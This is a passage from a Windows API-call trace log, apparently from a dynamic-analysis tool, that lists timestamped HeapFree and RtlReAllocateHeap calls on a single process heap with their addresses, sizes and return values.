lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0159.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0159.659] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456b7b0, Size=0x8000) returned 0x456b7b0 [0159.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0159.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0159.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0160.165] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456b7b0, Size=0x10000) returned 0x4524fd8 [0160.670] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4524fd8, Size=0x20000) returned 0x4524fd8 [0160.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0161.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0161.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe0 | out: hHeap=0x6a0000) returned 1 [0161.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe0 | out: hHeap=0x6a0000) returned 1 [0161.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe0 | out: hHeap=0x6a0000) returned 1 [0161.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe0 | out: hHeap=0x6a0000) returned 1 [0161.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0161.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0161.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0161.178] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4524fd8, Size=0x40000) returned 0x4610f98 [0161.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4650fa0 | out: hHeap=0x6a0000) returned 1 [0161.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4650fa0 | out: hHeap=0x6a0000) returned 1 [0161.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4650fa0 | out: hHeap=0x6a0000) returned 1 [0161.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0161.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4650fa0 | out: hHeap=0x6a0000) returned 1 [0161.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4650fa0 | out: hHeap=0x6a0000) returned 1 [0161.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4650fa0 | out: hHeap=0x6a0000) returned 1 [0161.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4650fa0 | out: hHeap=0x6a0000) returned 1 [0161.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0161.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672520 | out: hHeap=0x6a0000) returned 1 [0162.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662518 | out: hHeap=0x6a0000) returned 1 [0162.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0162.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0162.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0162.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0163.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0163.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0163.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0163.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0163.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0163.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0163.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.089] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.815] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0164.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4650fa0 | out: hHeap=0x6a0000) returned 1 [0165.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0165.642] HeapFree (in: 